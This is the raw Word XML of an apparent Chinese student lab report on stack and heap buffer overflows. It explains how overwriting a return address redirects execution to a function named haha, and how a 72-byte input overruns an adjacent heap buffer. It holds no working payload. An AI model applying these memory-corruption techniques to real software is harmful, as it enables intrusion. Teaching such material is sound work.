        <w:t>栈是从高地址向低地址写入的，一般用作函数调用是存放返回地址，一些参数等，而数据的写入是从低地址写向高地址的，这样就可以将栈顶的返回函数和参数覆盖，从而使程序在执行调用函数完毕时调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ret函数时，可以被攻击者利用为返回到任意地址。进而通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等操作使ret“降落”在自己的恶意代码上，执行并危害计算机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36F7A008" w14:textId="68CBC722" w:rsidR="00A462C6" w:rsidRDefault="00A462C6" w:rsidP="0030071C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="42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基于堆的缓冲区溢出的原理：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在给变量分配堆内存空间时，申请到堆的地址在释放之前保持不变，可以利用申请两个堆空间，利用物理地址小的堆地址进行缓冲区溢出，并覆盖后面的大地址的堆空间，达到攻击目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D35979" w14:textId="361359DB" w:rsidR="00EA5C10" w:rsidRDefault="00EA5C10" w:rsidP="00EA5C10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EA5C10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>给出溢出的结果，程序运行后的状态或屏幕截图等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384EB745" w14:textId="2A352FC6" w:rsidR="00A462C6" w:rsidRPr="00051079" w:rsidRDefault="00051079" w:rsidP="00051079">
      <w:pPr>
        <w:pStyle w:val="a3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对于栈溢出实验，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28B6D4" w14:textId="7E8D335A" w:rsidR="00A462C6" w:rsidRDefault="00A462C6" w:rsidP="00A462C6">
      <w:pPr>
        <w:pStyle w:val="a3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C12FDD6" wp14:editId="099A9AC1">
            <wp:extent cx="5274310" cy="4010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FF68" w14:textId="01F75488" w:rsidR="00A462C6" w:rsidRPr="00A462C6" w:rsidRDefault="00A462C6" w:rsidP="00A462C6">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对该代码缓冲区溢出攻击指的是：传入一个超过缓冲区</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>长度的字符串，执行拷贝后，缓冲区溢出，把ret返回地址修改成函数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>haha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的地址，达到调用函数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>haha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8AD61E" w14:textId="77777777" w:rsidR="00A462C6" w:rsidRPr="00A462C6" w:rsidRDefault="00A462C6" w:rsidP="00A462C6">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字符串X</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>构造说明：前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8个字节填充的是函数fun中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数组</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，之后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4个字节填充的是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sfp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，即调用者的EBP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，最后四个字节填充的是返回地址，根据打印出函数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>haha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的地址确定</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C451504" w14:textId="77777777" w:rsidR="00A462C6" w:rsidRPr="00A462C6" w:rsidRDefault="00A462C6" w:rsidP="00A462C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行后结果执行了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>aha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A462C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>函数，表明产生了缓冲区溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6AF23D" w14:textId="1C5B5D3F" w:rsidR="00A462C6" w:rsidRPr="00A462C6" w:rsidRDefault="00A462C6" w:rsidP="00A462C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto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E11667" wp14:editId="1C50BF05">
            <wp:extent cx="5274310" cy="3832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E1A" w14:textId="576A6613" w:rsidR="00EA5C10" w:rsidRDefault="00A462C6" w:rsidP="00EA5C10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对于堆溢出实验：</w:t>
      </w:r>
      <w:r w:rsidR="00051079">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如下列代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAC277" w14:textId="625EF71B" w:rsidR="00051079" w:rsidRDefault="00051079" w:rsidP="00EA5C10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C8A062" wp14:editId="22BDB1E9">
            <wp:extent cx="3917019" cy="328450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13D" w14:textId="67D11559" w:rsidR="00051079" w:rsidRDefault="00051079" w:rsidP="00EA5C10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字符串构造说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CF8BB" w14:textId="1F4FFA74" w:rsidR="00051079" w:rsidRDefault="00051079" w:rsidP="00EA5C10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="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F80AAB0" wp14:editId="66211C85">
            <wp:extent cx="4913920" cy="2406770"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="http://images.cnblogs.com/cnblogs_com/coderzh/security/simplehe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blogs.com/cnblogs_com/coderzh/security/simplehee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14" cy="241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9ABC" w14:textId="77777777" w:rsidR="00051079" w:rsidRPr="00051079" w:rsidRDefault="00051079" w:rsidP="00051079">
      <w:pPr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因此构造字符串应该</w:t>
      </w:r>
      <w:r w:rsidRPr="00051079">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据两个内存地址的差值(即output和input地址的差值)来构造字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47E957" w14:textId="665BABA6" w:rsidR="00051079" w:rsidRPr="00051079" w:rsidRDefault="00051079" w:rsidP="00051079">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00051079">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>运行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D4EAC0" w14:textId="7A7F1E65" w:rsidR="00051079" w:rsidRPr="00051079" w:rsidRDefault="00051079" w:rsidP="0005107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79BE0D9C" wp14:editId="17A1BF5A">
            <wp:extent cx="5274310" cy="3829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4F48" w14:textId="77777777" w:rsidR="00051079" w:rsidRPr="00051079" w:rsidRDefault="00051079" w:rsidP="00051079">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00051079">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结果可以看出，input字符串覆盖了output的内存区域，从而实现了堆溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E44B7" w14:textId="77777777" w:rsidR="00051079" w:rsidRPr="00051079" w:rsidRDefault="00051079" w:rsidP="00051079">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00051079">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>两个内存地址的差值为0x004F0718-0x004F06D0=0x48 即72字节，所以字符串应该构造为72字节+output内容。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00051079" w:rsidRPr="00051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81093"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93E2BDCA"/>
    <w:lvl w:ilvl="0" w:tplc="C2D05E4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ED50090"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E03A92F8"/>
    <w:lvl w:ilvl="0" w:tplc="0E121CBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia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97E"/>
    <w:rsid w:val="00051079"/>
    <w:rsid w:val="001124BE"/>
    <w:rsid w:val="00117EF7"/>
    <w:rsid w:val="0014516E"/>
    <w:rsid w:val="001B03FA"/>
    <w:rsid w:val="0030071C"/>
    <w:rsid w:val="00395F66"/>
    <w:rsid w:val="0042725B"/>
    <w:rsid w:val="00476DF0"/>
    <w:rsid w:val="004C62F7"/>
    <w:rsid w:val="005429D2"/>
    <w:rsid w:val="006213F1"/>
    <w:rsid w:val="0088197E"/>
    <w:rsid w:val="00A462C6"/>
    <w:rsid w:val="00AA0F1D"/>
    <w:rsid w:val="00B8183C"/>
    <w:rsid w:val="00BE322B"/>
    <w:rsid w:val="00EA5C10"/>
    <w:rsid w:val="00FE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4456"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5F85C41A-FEB2-4307-A781-DB2352E84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97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9D2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9D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260" w:line="416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29D2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29D2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9D2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29D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi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E4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429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 宗磊</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>贺 宗磊</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-18T12:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-19T01:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>